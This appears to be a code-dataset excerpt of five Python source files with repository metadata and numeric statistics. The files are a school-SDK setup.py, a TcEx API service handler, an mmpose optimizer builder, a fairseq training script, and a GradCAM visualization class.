| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5ec93a99d9c113668c2693c8d65499328f692cd
| 1,489
|
py
|
Python
|
zf-setup.py
|
Ziki2001/new-school-sdk
|
b606e666888e1c9813e2f1a6a64bbede3744026e
|
[
"MIT"
] | null | null | null |
zf-setup.py
|
Ziki2001/new-school-sdk
|
b606e666888e1c9813e2f1a6a64bbede3744026e
|
[
"MIT"
] | null | null | null |
zf-setup.py
|
Ziki2001/new-school-sdk
|
b606e666888e1c9813e2f1a6a64bbede3744026e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
:file: setup.py
:author: -Farmer
:url: https://blog.farmer233.top
:date: 2021/09/20 11:11:54
'''
from os import path
from setuptools import setup, find_packages
basedir = path.abspath(path.dirname(__file__))
with open(path.join(basedir, "README.md"), encoding='utf-8') as f:
long_description = f.read()
setup(
name="zf-school-sdk",
author="farmer.chillax",
version="1.3.2",
license='MIT',
author_email="farmer-chong@qq.com",
description="zf School SDK for Python",
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/Farmer-chong/new-school-sdk',
packages=find_packages(),
# package_data={},
package_data={"school_sdk": ['check_code/model.pkl']},
include_package_data=True,
platforms='any',
zip_safe=False,
install_requires=[
'requests',
'pyquery',
'bs4',
'Pillow',
'fake-headers',
'torch',
'torchvision',
],
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.8',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
# python zf-setup.py bdist_wheel sdist
# twine upload dist/*
| 26.589286
| 70
| 0.620551
| 172
| 1,489
| 5.244186
| 0.662791
| 0.066519
| 0.02439
| 0.066519
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021701
| 0.226326
| 1,489
| 56
| 71
| 26.589286
| 0.761285
| 0.126931
| 0
| 0
| 0
| 0
| 0.403454
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.051282
| 0
| 0.051282
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5edd2119227be04c5621c163a6292b04c441de0
| 10,716
|
py
|
Python
|
tcex/services/api_service.py
|
kdeltared/tcex
|
818c0d09256764f871e42d9ca5916f92d941d882
|
[
"Apache-2.0"
] | null | null | null |
tcex/services/api_service.py
|
kdeltared/tcex
|
818c0d09256764f871e42d9ca5916f92d941d882
|
[
"Apache-2.0"
] | null | null | null |
tcex/services/api_service.py
|
kdeltared/tcex
|
818c0d09256764f871e42d9ca5916f92d941d882
|
[
"Apache-2.0"
] | null | null | null |
"""TcEx Framework API Service module."""
# standard library
import json
import sys
import threading
import traceback
from io import BytesIO
from typing import Any
from .common_service import CommonService
class ApiService(CommonService):
"""TcEx Framework API Service module."""
def __init__(self, tcex: object):
"""Initialize the Class properties.
Args:
tcex: Instance of TcEx.
"""
super().__init__(tcex)
# properties
self._metrics = {'Errors': 0, 'Requests': 0, 'Responses': 0}
# config callbacks
self.api_event_callback = None
@property
def command_map(self) -> dict:
"""Return the command map for the current Service type."""
command_map = super().command_map
command_map.update({'runservice': self.process_run_service_command})
return command_map
def format_query_string(self, params: dict) -> str:
"""Convert name/value array to a query string.
Args:
params: The query params for the request.
Returns:
str: The query params reformatted as a string.
"""
query_string = []
try:
for q in params:
query_string.append(f'''{q.get('name')}={q.get('value')}''')
except AttributeError as e:
self.log.error(
f'feature=api-service, event=bad-params-provided, params={params}, error="""{e})"""'
)
self.log.trace(traceback.format_exc())
return '&'.join(query_string)
def format_request_headers(self, headers: dict) -> dict:
"""Convert name/value array to a headers dict.
Args:
headers: The dict of key/value header data.
Returns:
dict: The restructured header data.
"""
headers_ = {}
try:
for h in headers:
# TODO: either support tuple or csv list of values
# headers_.setdefault(h.get('name').lower(), []).append(h.get('value'))
headers_.setdefault(h.get('name').lower(), str(h.get('value')))
except AttributeError as e:
self.log.error(
f'feature=api-service, event=bad-headers-provided, '
f'headers={headers}, error="""{e})"""'
)
self.log.trace(traceback.format_exc())
return headers_
def format_response_headers(self, headers: dict) -> dict:
"""Convert name/value array to a query string.
Args:
headers: The dict header data to be converted to key/value pairs.
Returns:
dict: The restructured header data.
"""
headers_ = []
try:
for h in headers:
headers_.append({'name': h[0], 'value': h[1]})
except AttributeError as e:
self.log.error(
f'feature=api-service, event=bad-headers-provided, '
f'headers={headers}, error="""{e})"""'
)
self.log.trace(traceback.format_exc())
return headers_
def process_run_service_response(self, *args, **kwargs) -> None:
"""Handle service event responses.
('200 OK', [('content-type', 'application/json'), ('content-length', '103')])
"""
self.log.info('feature=api-service, event=response-received, status=waiting-for-body')
kwargs.get('event').wait(30) # wait for thread event - (set on body write)
self.log.trace(f'feature=api-service, event=response, args={args}')
try:
status_code, status = args[0].split(' ', 1)
response = {
'bodyVariable': 'response.body',
'command': 'Acknowledged',
'headers': self.format_response_headers(args[1]),
'requestKey': kwargs.get('request_key'), # pylint: disable=cell-var-from-loop
'status': status,
'statusCode': status_code,
'type': 'RunService',
}
self.log.info('feature=api-service, event=response-sent')
self.message_broker.publish(json.dumps(response), self.args.tc_svc_client_topic)
self.increment_metric('Responses')
except Exception as e:
self.log.error(
f'feature=api-service, event=failed-creating-response-body, error="""{e}"""'
)
self.log.trace(traceback.format_exc())
self.increment_metric('Errors')
def process_run_service_command(self, message: dict) -> None:
"""Process the RunService command.
.. code-block:: python
:linenos:
:lineno-start: 1
{
"command": "RunService",
"apiToken": "abc123",
"bodyVariable": "request.body",
"headers": [ { key/value pairs } ],
"method": "GET",
"queryParams": [ { key/value pairs } ],
"requestKey": "123abc",
"userConfig": [{
"name": "tlpExportSetting",
"value": "TLP:RED"
}],
}
Args:
message: The message payload from the server topic.
"""
# register config apiToken (before any logging)
self.token.register_token(
self.thread_name, message.get('apiToken'), message.get('expireSeconds')
)
self.log.info(f'feature=api-service, event=runservice-command, message="{message}"')
# thread event used to block response until body is written
event = threading.Event()
# process message
request_key: str = message.get('requestKey')
body = None
try:
# read body from redis
body_variable: str = message.pop('bodyVariable', None)
if body_variable is not None:
body: Any = self.key_value_store.read(request_key, body_variable)
if body is not None:
# for API service the data in Redis is not b64 encoded
body = BytesIO(body)
except Exception as e:
self.log.error(f'feature=api-service, event=failed-reading-body, error="""{e}"""')
self.log.trace(traceback.format_exc())
headers: dict = self.format_request_headers(message.pop('headers'))
method: str = message.pop('method')
params: dict = message.pop('queryParams')
path: str = message.pop('path')
try:
environ = {
'wsgi.errors': sys.stderr,
'wsgi.input': body,
'wsgi.multithread': True,
'wsgi.multiprocess': False,
'wsgi.run_once': True,
'wsgi.url_scheme': 'https',
'wsgi.version': (1, 0),
'PATH_INFO': path,
'QUERY_STRING': self.format_query_string(params),
'REMOTE_ADDR': message.get('remoteAddress', ''),
# 'REMOTE_HOST': message.get('remoteAddress', ''),
'REQUEST_METHOD': method.upper(),
'SCRIPT_NAME': '/',
'SERVER_NAME': '',
'SERVER_PORT': '',
'SERVER_PROTOCOL': 'HTTP/1.1',
}
# Add user config for TAXII or other service that supports the data type
environ['user_config'] = message.get('userConfig', [])
# add headers
if headers.get('content-type') is not None:
environ['CONTENT_TYPE'] = headers.pop('content-type')
# add content length
if headers.get('content-length') is not None:
environ['CONTENT_LENGTH'] = headers.pop('content-length')
for header, value in headers.items():
environ[f'HTTP_{header}'.upper()] = value
# make values from message available in env in camel
# case (e.g., falcon -> req.env.get('request_url))
for key, value in message.items():
if key not in environ and self.tcex.utils.camel_to_snake(key) not in environ:
environ[self.tcex.utils.camel_to_snake(key)] = value
self.log.trace(f'feature=api-service, environ={environ}')
self.increment_metric('Requests')
except Exception as e:
self.log.error(f'feature=api-service, event=failed-building-environ, error="""{e}"""')
self.log.trace(traceback.format_exc())
self.increment_metric('Errors')
return # stop processing
def response_handler(*args, **kwargs): # pylint: disable=unused-argument
"""Handle WSGI Response"""
kwargs['event'] = event # add event to kwargs for blocking
kwargs['request_key'] = request_key
self.service_thread(
name='response-handler',
target=self.process_run_service_response,
args=args,
kwargs=kwargs,
)
if callable(self.api_event_callback):
try:
body_data: Any = self.api_event_callback( # pylint: disable=not-callable
environ, response_handler
)
# process body
body = ''
if hasattr(body_data, 'read'):
body = body_data.read()
elif isinstance(body_data, list):
for bd in body_data:
if hasattr(bd, 'read'):
body += bd.read()
elif isinstance(bd, bytes):
body += bd.decode()
elif isinstance(bd, list):
for b in bd:
self.log.error(f'unhandled type - {type(b)}')
else:
self.log.error(f'unhandled type - {type(body)}')
self.log.error(f'unhandled type dir - {dir(body)}')
# write body to Redis
self.key_value_store.create(request_key, 'response.body', body)
# set thread event to True to trigger response
self.log.info('feature=api-service, event=response-body-written')
event.set()
except Exception as e:
self.log.error(
f'feature=api-service, event=api-event-callback-failed, error="""{e}""".'
)
self.log.trace(traceback.format_exc())
self.increment_metric('Errors')
# unregister config apiToken
self.token.unregister_token(self.thread_name)
| 38.271429
| 100
| 0.535741
| 1,131
| 10,716
| 4.971706
| 0.220159
| 0.028632
| 0.019918
| 0.04695
| 0.295038
| 0.27014
| 0.254846
| 0.223546
| 0.201672
| 0.176774
| 0
| 0.004131
| 0.344905
| 10,716
| 279
| 101
| 38.408602
| 0.796866
| 0.205767
| 0
| 0.216374
| 0
| 0.005848
| 0.196624
| 0.041271
| 0
| 0
| 0
| 0.003584
| 0
| 1
| 0.046784
| false
| 0
| 0.040936
| 0
| 0.122807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5ee43eaf3c3033dcd289654572ab9b3e0e7b99a
| 1,540
|
py
|
Python
|
mmpose/core/optimizer/builder.py
|
vsatyakumar/mmpose
|
2fffccb19dad3b59184b41be94653f75523b8585
|
[
"Apache-2.0"
] | 1
|
2021-05-06T08:40:13.000Z
|
2021-05-06T08:40:13.000Z
|
mmpose/core/optimizer/builder.py
|
CV-IP/mmpose
|
3ef8e6dbbeb6262b7ed6c51faa74b83c23f4c6a1
|
[
"Apache-2.0"
] | null | null | null |
mmpose/core/optimizer/builder.py
|
CV-IP/mmpose
|
3ef8e6dbbeb6262b7ed6c51faa74b83c23f4c6a1
|
[
"Apache-2.0"
] | null | null | null |
from mmcv.runner import build_optimizer
def build_optimizers(model, cfgs):
"""Build multiple optimizers from configs.
If `cfgs` contains several dicts for optimizers, then a dict for each
constructed optimizers will be returned.
If `cfgs` only contains one optimizer config, the constructed optimizer
itself will be returned.
For example,
1) Multiple optimizer configs:
.. code-block:: python
optimizer_cfg = dict(
model1=dict(type='SGD', lr=lr),
model2=dict(type='SGD', lr=lr))
The return dict is
``dict('model1': torch.optim.Optimizer, 'model2': torch.optim.Optimizer)``
2) Single optimizer config:
.. code-block:: python
optimizer_cfg = dict(type='SGD', lr=lr)
The return is ``torch.optim.Optimizer``.
Args:
model (:obj:`nn.Module`): The model with parameters to be optimized.
cfgs (dict): The config dict of the optimizer.
Returns:
dict[:obj:`torch.optim.Optimizer`] | :obj:`torch.optim.Optimizer`:
The initialized optimizers.
"""
optimizers = {}
if hasattr(model, 'module'):
model = model.module
# determine whether 'cfgs' has several dicts for optimizers
if all(isinstance(v, dict) for v in cfgs.values()):
for key, cfg in cfgs.items():
cfg_ = cfg.copy()
module = getattr(model, key)
optimizers[key] = build_optimizer(module, cfg_)
return optimizers
else:
return build_optimizer(model, cfgs)
| 29.056604
| 78
| 0.635065
| 190
| 1,540
| 5.105263
| 0.378947
| 0.051546
| 0.097938
| 0.040206
| 0.124742
| 0.109278
| 0.049485
| 0
| 0
| 0
| 0
| 0.005249
| 0.257792
| 1,540
| 52
| 79
| 29.615385
| 0.843395
| 0.627922
| 0
| 0
| 0
| 0
| 0.012658
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.076923
| 0
| 0.307692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5efef002e68abbec6057f8677301ab26bdc9a66
| 16,846
|
py
|
Python
|
custom_train.py
|
shirley-wu/text_to_table
|
44cb100b8ff2543b5b4efe1461502c00c34ef846
|
[
"MIT"
] | 3
|
2022-03-17T05:55:23.000Z
|
2022-03-30T08:34:14.000Z
|
custom_train.py
|
shirley-wu/text_to_table
|
44cb100b8ff2543b5b4efe1461502c00c34ef846
|
[
"MIT"
] | 1
|
2022-03-30T09:04:54.000Z
|
2022-03-30T09:04:54.000Z
|
custom_train.py
|
shirley-wu/text_to_table
|
44cb100b8ff2543b5b4efe1461502c00c34ef846
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3 -u
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Train a new model on one or across multiple GPUs.
"""
import collections
import logging
import math
import os
import sys
import numpy as np
import torch
from fairseq import (
checkpoint_utils,
distributed_utils,
options,
quantization_utils,
tasks,
utils,
)
from fairseq import meters
from fairseq.checkpoint_utils import checkpoint_paths
from fairseq.data import iterators
from fairseq.file_io import PathManager
from fairseq.logging import metrics, progress_bar
from fairseq.model_parallel.megatron_trainer import MegatronTrainer
from fairseq.trainer import Trainer
logging.basicConfig(
format="%(asctime)s | %(levelname)s | %(name)s | %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=os.environ.get("LOGLEVEL", "INFO").upper(),
stream=sys.stdout,
)
logger = logging.getLogger("fairseq_cli.train")
class Saver:
def __init__(self):
self.best = None
self.keep_best = []
def save_checkpoint(self, args, trainer, epoch_itr, val_loss):
# only one worker should attempt to create the required dir
if args.distributed_rank == 0:
os.makedirs(args.save_dir, exist_ok=True)
prev_best = val_loss if self.best is None else self.best
if val_loss is not None:
best_function = max if args.maximize_best_checkpoint_metric else min
self.best = best_function(val_loss, prev_best)
if args.no_save:
return
trainer.consolidate_optimizer()
if not trainer.is_data_parallel_master:
return
def is_better(a, b):
return a >= b if args.maximize_best_checkpoint_metric else a <= b
write_timer = meters.StopwatchMeter()
write_timer.start()
epoch = epoch_itr.epoch
end_of_epoch = epoch_itr.end_of_epoch()
updates = trainer.get_num_updates()
suffix = getattr(args, "checkpoint_suffix", "")
checkpoint_conds = collections.OrderedDict()
save_epoch_checkpoint = (
end_of_epoch
and not args.no_epoch_checkpoints
and epoch % args.save_interval == 0
)
checkpoint_conds["checkpoint{}{}.pt".format(epoch, suffix)] = save_epoch_checkpoint
checkpoint_conds["checkpoint_{}_{}{}.pt".format(epoch, updates, suffix)] = (
not save_epoch_checkpoint
and args.save_interval_updates > 0
and updates % args.save_interval_updates == 0
)
checkpoint_conds["checkpoint_best{}.pt".format(suffix)] = val_loss is not None and (
self.best is None
or is_better(val_loss, self.best)
)
checkpoint_conds[
"checkpoint_last{}.pt".format(suffix)
] = not args.no_last_checkpoints
extra_state = {"train_iterator": epoch_itr.state_dict(), "val_loss": val_loss}
if self.best is not None:
extra_state.update({"best": self.best})
if args.keep_best_checkpoints > 0 and (len(self.keep_best) < args.keep_best_checkpoints or (
val_loss is not None and not is_better(self.keep_best[-1][0], val_loss))):
ckpt_name = "checkpoint{}{}.best_{:.4f}.pt".format(epoch, suffix, val_loss) if save_epoch_checkpoint \
else "checkpoint_{}_{}{}.best_{:.4f}.pt".format(epoch, updates, suffix, val_loss)
checkpoint_conds[ckpt_name] = True
self.keep_best.append((val_loss, ckpt_name))
self.keep_best = sorted(self.keep_best)
checkpoints = [
os.path.join(args.save_dir, fn) for fn, cond in checkpoint_conds.items() if cond
]
if len(checkpoints) > 0:
trainer.save_checkpoint(checkpoints[0], extra_state)
for cp in checkpoints[1:]:
PathManager.copy(checkpoints[0], cp, overwrite=True)
write_timer.stop()
logger.info(
"saved checkpoint {} (epoch {} @ {} updates, score {}) (writing took {} seconds)".format(
checkpoints[0], epoch, updates, val_loss, write_timer.sum
)
)
if not end_of_epoch and args.keep_interval_updates > 0:
# remove old checkpoints; checkpoints are sorted in descending order
checkpoints = checkpoint_paths(
args.save_dir, pattern=r"checkpoint_\d+_(\d+)\.pt"
)
for old_chk in checkpoints[args.keep_interval_updates:]:
if os.path.lexists(old_chk):
os.remove(old_chk)
if args.keep_last_epochs > 0:
# remove old epoch checkpoints; checkpoints are sorted in descending order
checkpoints = checkpoint_paths(args.save_dir, pattern=r"checkpoint(\d+)\.pt")
for old_chk in checkpoints[args.keep_last_epochs:]:
if os.path.lexists(old_chk):
os.remove(old_chk)
if len(self.keep_best) > args.keep_best_checkpoints:
for _, x in self.keep_best[args.keep_best_checkpoints:]:
x = os.path.join(args.save_dir, x)
if os.path.lexists(x):
os.remove(x)
self.keep_best = self.keep_best[:args.keep_best_checkpoints]
def main(args):
saver = Saver()
utils.import_user_module(args)
assert (
args.max_tokens is not None or args.batch_size is not None
), "Must specify batch size either with --max-tokens or --batch-size"
metrics.reset()
np.random.seed(args.seed)
utils.set_torch_seed(args.seed)
if distributed_utils.is_master(args):
checkpoint_utils.verify_checkpoint_directory(args.save_dir)
# Print args
logger.info(args)
# Setup task, e.g., translation, language modeling, etc.
task = tasks.setup_task(args)
# Load valid dataset (we load training data below, based on the latest checkpoint)
for valid_sub_split in args.valid_subset.split(","):
task.load_dataset(valid_sub_split, combine=False, epoch=1)
# Build model and criterion
model = task.build_model(args)
criterion = task.build_criterion(args)
logger.info(model)
logger.info("task: {} ({})".format(args.task, task.__class__.__name__))
logger.info("model: {} ({})".format(args.arch, model.__class__.__name__))
logger.info(
"criterion: {} ({})".format(args.criterion, criterion.__class__.__name__)
)
logger.info(
"num. model params: {} (num. trained: {})".format(
sum(p.numel() for p in model.parameters()),
sum(p.numel() for p in model.parameters() if p.requires_grad),
)
)
# (optionally) Configure quantization
if args.quantization_config_path is not None:
quantizer = quantization_utils.Quantizer(
config_path=args.quantization_config_path,
max_epoch=args.max_epoch,
max_update=args.max_update,
)
else:
quantizer = None
# Build trainer
if args.model_parallel_size == 1:
trainer = Trainer(args, task, model, criterion, quantizer)
else:
trainer = MegatronTrainer(args, task, model, criterion)
logger.info(
"training on {} devices (GPUs/TPUs)".format(args.distributed_world_size)
)
logger.info(
"max tokens per GPU = {} and max sentences per GPU = {}".format(
args.max_tokens, args.batch_size
)
)
# Load the latest checkpoint if one is available and restore the
# corresponding train iterator
extra_state, epoch_itr = checkpoint_utils.load_checkpoint(
args,
trainer,
# don't cache epoch iterators for sharded datasets
disable_iterator_cache=task.has_sharded_data("train"),
)
# Train until the learning rate gets too small
max_epoch = args.max_epoch or math.inf
lr = trainer.get_lr()
train_meter = meters.StopwatchMeter()
train_meter.start()
while lr > args.min_lr and epoch_itr.next_epoch_idx <= max_epoch:
# train for one epoch
valid_losses, should_stop = train(args, trainer, task, epoch_itr, saver)
if should_stop:
break
# only use first validation loss to update the learning rate
lr = trainer.lr_step(epoch_itr.epoch, valid_losses[0])
epoch_itr = trainer.get_train_iterator(
epoch_itr.next_epoch_idx,
# sharded data: get train iterator for next epoch
load_dataset=task.has_sharded_data("train"),
# don't cache epoch iterators for sharded datasets
disable_iterator_cache=task.has_sharded_data("train"),
)
train_meter.stop()
logger.info("done training in {:.1f} seconds".format(train_meter.sum))
def should_stop_early(args, valid_loss):
# skip check if no validation was done in the current epoch
if valid_loss is None:
return False
if args.patience <= 0:
return False
def is_better(a, b):
return a > b if args.maximize_best_checkpoint_metric else a < b
prev_best = getattr(should_stop_early, "best", None)
if prev_best is None or is_better(valid_loss, prev_best):
should_stop_early.best = valid_loss
should_stop_early.num_runs = 0
return False
else:
should_stop_early.num_runs += 1
if should_stop_early.num_runs >= args.patience:
logger.info(
"early stop since valid performance hasn't improved for last {} runs".format(
args.patience
)
)
return True
else:
return False
@metrics.aggregate("train")
def train(args, trainer, task, epoch_itr, saver):
"""Train the model for one epoch and return validation losses."""
# Initialize data iterator
itr = epoch_itr.next_epoch_itr(
fix_batches_to_gpus=args.fix_batches_to_gpus,
shuffle=(epoch_itr.next_epoch_idx > args.curriculum),
)
update_freq = (
args.update_freq[epoch_itr.epoch - 1]
if epoch_itr.epoch <= len(args.update_freq)
else args.update_freq[-1]
)
itr = iterators.GroupedIterator(itr, update_freq)
if getattr(args, "tpu", False):
itr = utils.tpu_data_loader(itr)
progress = progress_bar.progress_bar(
itr,
log_format=args.log_format,
log_interval=args.log_interval,
epoch=epoch_itr.epoch,
tensorboard_logdir=(
args.tensorboard_logdir if distributed_utils.is_master(args) else None
),
default_log_format=("tqdm" if not args.no_progress_bar else "simple"),
)
trainer.begin_epoch(epoch_itr.epoch)
valid_losses = [None]
valid_subsets = args.valid_subset.split(",")
should_stop = False
num_updates = trainer.get_num_updates()
for i, samples in enumerate(progress):
with metrics.aggregate("train_inner"), torch.autograd.profiler.record_function(
"train_step-%d" % i
):
log_output = trainer.train_step(samples)
if log_output is not None: # not OOM, overflow, ...
# log mid-epoch stats
num_updates = trainer.get_num_updates()
if num_updates % args.log_interval == 0:
stats = get_training_stats(metrics.get_smoothed_values("train_inner"))
progress.log(stats, tag="train_inner", step=num_updates)
# reset mid-epoch stats after each log interval
# the end-of-epoch stats will still be preserved
metrics.reset_meters("train_inner")
end_of_epoch = not itr.has_next()
valid_losses, should_stop = validate_and_save(
args, trainer, task, epoch_itr, valid_subsets, end_of_epoch, saver
)
if should_stop:
break
# log end-of-epoch stats
logger.info("end of epoch {} (average epoch stats below)".format(epoch_itr.epoch))
stats = get_training_stats(metrics.get_smoothed_values("train"))
progress.print(stats, tag="train", step=num_updates)
# reset epoch-level meters
metrics.reset_meters("train")
return valid_losses, should_stop
def validate_and_save(args, trainer, task, epoch_itr, valid_subsets, end_of_epoch, saver):
num_updates = trainer.get_num_updates()
max_update = args.max_update or math.inf
do_save = (
(end_of_epoch and epoch_itr.epoch % args.save_interval == 0)
or num_updates >= max_update
or (
args.save_interval_updates > 0
and num_updates > 0
and num_updates % args.save_interval_updates == 0
and num_updates >= args.validate_after_updates
)
)
do_validate = (
(not end_of_epoch and do_save) # validate during mid-epoch saves
or (end_of_epoch and epoch_itr.epoch % args.validate_interval == 0)
or num_updates >= max_update
or (
args.validate_interval_updates > 0
and num_updates > 0
and num_updates % args.validate_interval_updates == 0
)
) and not args.disable_validation
# Validate
valid_losses = [None]
if do_validate:
valid_losses = validate(args, trainer, task, epoch_itr, valid_subsets, saver)
# Stopping conditions
should_stop = (
should_stop_early(args, valid_losses[0])
or num_updates >= max_update
or (
args.stop_time_hours > 0
and trainer.cumulative_training_time() / (60 * 60) > args.stop_time_hours
)
)
# Save checkpoint
if do_save or should_stop:
logger.info("begin save checkpoint")
saver.save_checkpoint(args, trainer, epoch_itr, valid_losses[0])
return valid_losses, should_stop
def get_training_stats(stats):
stats["wall"] = round(metrics.get_meter("default", "wall").elapsed_time, 0)
return stats
def validate(args, trainer, task, epoch_itr, subsets, saver):
"""Evaluate the model on the validation set(s) and return the losses."""
if args.fixed_validation_seed is not None:
# set fixed seed for every validation
utils.set_torch_seed(args.fixed_validation_seed)
trainer.begin_valid_epoch(epoch_itr.epoch)
valid_losses = []
for subset in subsets:
logger.info('begin validation on "{}" subset'.format(subset))
# Initialize data iterator
itr = trainer.get_valid_iterator(subset).next_epoch_itr(shuffle=False)
if getattr(args, "tpu", False):
itr = utils.tpu_data_loader(itr)
progress = progress_bar.progress_bar(
itr,
log_format=args.log_format,
log_interval=args.log_interval,
epoch=epoch_itr.epoch,
prefix=f"valid on '{subset}' subset",
tensorboard_logdir=(
args.tensorboard_logdir if distributed_utils.is_master(args) else None
),
default_log_format=("tqdm" if not args.no_progress_bar else "simple"),
)
# create a new root metrics aggregator so validation metrics
# don't pollute other aggregators (e.g., train meters)
with metrics.aggregate(new_root=True) as agg:
for sample in progress:
trainer.valid_step(sample)
# log validation stats
stats = get_valid_stats(args, trainer, agg.get_smoothed_values(), saver)
progress.print(stats, tag=subset, step=trainer.get_num_updates())
valid_losses.append(stats[args.best_checkpoint_metric])
return valid_losses
def get_valid_stats(args, trainer, stats, saver):
stats["num_updates"] = trainer.get_num_updates()
if hasattr(saver.save_checkpoint, "best"):
key = "best_{0}".format(args.best_checkpoint_metric)
best_function = max if args.maximize_best_checkpoint_metric else min
stats[key] = best_function(
saver.save_checkpoint.best, stats[args.best_checkpoint_metric]
)
return stats
def cli_main(modify_parser=None):
parser = options.get_training_parser()
args = options.parse_args_and_arch(parser, modify_parser=modify_parser)
if args.profile:
with torch.cuda.profiler.profile():
with torch.autograd.profiler.emit_nvtx():
distributed_utils.call_main(args, main)
else:
distributed_utils.call_main(args, main)
if __name__ == "__main__":
cli_main()
| 36.306034
| 114
| 0.633919
| 2,120
| 16,846
| 4.789623
| 0.171226
| 0.022848
| 0.012803
| 0.011818
| 0.348533
| 0.293776
| 0.219125
| 0.200315
| 0.167323
| 0.143983
| 0
| 0.003597
| 0.273893
| 16,846
| 463
| 115
| 36.384449
| 0.826521
| 0.10038
| 0
| 0.208092
| 0
| 0
| 0.06815
| 0.007087
| 0
| 0
| 0
| 0
| 0.00289
| 1
| 0.034682
| false
| 0
| 0.046243
| 0.00578
| 0.124277
| 0.00578
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5f13f54fb0bf75e7d45a4d1bb426a38fb3fb255
| 3,403
|
py
|
Python
|
visualization.py
|
shyhyawJou/GradCAM-pytorch
|
8159f077552fc71055fe97c17bf8544d32cc8b0f
|
[
"Apache-2.0"
] | null | null | null |
visualization.py
|
shyhyawJou/GradCAM-pytorch
|
8159f077552fc71055fe97c17bf8544d32cc8b0f
|
[
"Apache-2.0"
] | null | null | null |
visualization.py
|
shyhyawJou/GradCAM-pytorch
|
8159f077552fc71055fe97c17bf8544d32cc8b0f
|
[
"Apache-2.0"
] | null | null | null |
import torch
import torch.nn as nn
from torch.nn import functional as F
from PIL import Image
import cv2 as cv
from matplotlib import cm
import numpy as np
class GradCAM:
"""
#### Args:
layer_name: module name (not child name), if None,
will use the last layer before average pooling
, default is None
"""
def __init__(self, model, device, layer_name=None, close_some_grad=True):
if layer_name is None:
layer_name = self.get_layer_name(model)
if layer_name is None:
raise ValueError(
"There is no global average pooling layer, plz specify 'layer_name'"
)
for n, m in model.named_children():
if close_some_grad:
m.requires_grad_(False)
for sub_n, sub_m in m.named_modules():
if '.'.join((n, sub_n)) == layer_name:
sub_m.register_forward_hook(self.forward_hook)
sub_m.register_full_backward_hook(self.backward_hook)
m.requires_grad_(True)
break
model = model.to(device)
self.model = model
self.device = device
self.feature_maps = {}
self.gradients = {}
def get_heatmap(self, img, img_tensor):
self.model.zero_grad()
img_tensor = img_tensor.to(self.device)
outputs = self.model(img_tensor)
_, pred_label = outputs.max(1)
# outputs shape = 1x2
outputs[0][pred_label].backward()
with torch.no_grad():
feature_maps = self.feature_maps["output"]
# "gradients" is a tuple with one item
grad_weights = self.gradients["output"][0]
h, w = grad_weights.size()[-2:]
grad_weights = grad_weights.sum((2,3), True) / (h * w)
cam = (grad_weights * feature_maps).sum(1)
F.relu(cam, True)
cam = cam / cam.max() * 255
cam = cam.to(dtype=torch.uint8, device="cpu")
cam = cam.numpy().transpose(1,2,0)
cam = cv.resize(cam, img.size[:2], interpolation=4)
cam = np.uint8(255 * cm.get_cmap("jet")(cam.squeeze()))
if not isinstance(img, np.ndarray):
img = np.asarray(img)
img_size = img.shape[:2][::-1] # w, h
overlay = np.uint8(0.6*img + 0.4 * cam[:,:,:3])
overlay = Image.fromarray(overlay)
if overlay.size != img_size:
overlay = overlay.resize(img_size, Image.BILINEAR)
return outputs.detach(), overlay
def get_layer_name(self, model):
layer_name = None
for n, m in model.named_children():
for sub_n, sub_m in m.named_modules():
if isinstance(sub_m, (nn.AdaptiveAvgPool2d, nn.AvgPool2d)):
layer_name = tmp
tmp = '.'.join((n, sub_n))
return layer_name
def forward_hook(self, module, x, y):
#self.feature_maps["input"] = x
self.feature_maps["output"] = y
def backward_hook(self, module, x, y):
#self.gradients["input"] = x
self.gradients["output"] = y
self.gradients["output"] = y
| 34.72449
| 85
| 0.528945
| 416
| 3,403
| 4.151442
| 0.300481
| 0.062536
| 0.034742
| 0.015055
| 0.104227
| 0.08454
| 0.061378
| 0.032426
| 0.032426
| 0.032426
| 0
| 0.015242
| 0.363797
| 3,403
| 97
| 86
| 35.082474
| 0.782448
| 0.083162
| 0
| 0.117647
| 0
| 0
| 0.034771
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073529
| false
| 0
| 0.102941
| 0
| 0.220588
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
